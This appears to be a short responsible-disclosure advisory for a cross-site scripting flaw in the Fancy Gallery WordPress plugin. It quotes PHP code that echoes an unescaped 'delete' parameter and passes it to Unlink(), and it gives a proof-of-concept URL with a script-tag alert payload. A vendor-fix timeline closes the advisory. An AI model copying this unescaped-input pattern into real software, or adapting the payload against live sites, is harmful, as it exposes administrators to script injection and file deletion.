$_GET['delete']
is not escaped.
File: fancy-gallery\class.options.php
public function Load_Options_Page(){
# Check if the user trys to delete a template
If (IsSet($_GET['delete']) && $this->core->Get_Template_Properties ($_GET['delete'])){ # You can only delete Fancy Gallery Templates!
Unlink($_GET['delete']);
WP_Redirect( $this->Get_Options_Page_Url(Array('template_deleted' => 'true')) );
}
ElseIf (IsSet($_GET['delete'])){
WP_Die($this->t('Error while deleting: ' . $_GET['delete']));
}
}
private function t($text, $context = False){
return $this->core->t($text, $context);
}
File: fancy-gallery\class.core.php
public function t($text, $content = False){
return $this->i18n->t($text, $content);
}
File: fancy-gallery\class.i18n.php
public function t ($text, $context = Null){
# Translates the string $text with context $context
If (Empty($context))
return Translate ($text, __CLASS__);
Else
return Translate_With_GetText_Context ($text, $context, __CLASS__);
}
Proof of Concept
XSS will be visible for admin:
http://wordpress-url/wp-admin/options-general.php?page=WordPress/Plugin/Fancy_Gallery/Options&delete=<script>alert(String.fromCharCode(88,83,83,50));</script>
Timeline
- 13-11-2014: Discovered
- 13-11-2014: Vendor notified
- 16-11-2014: Version 1.5.13 released, issue resolved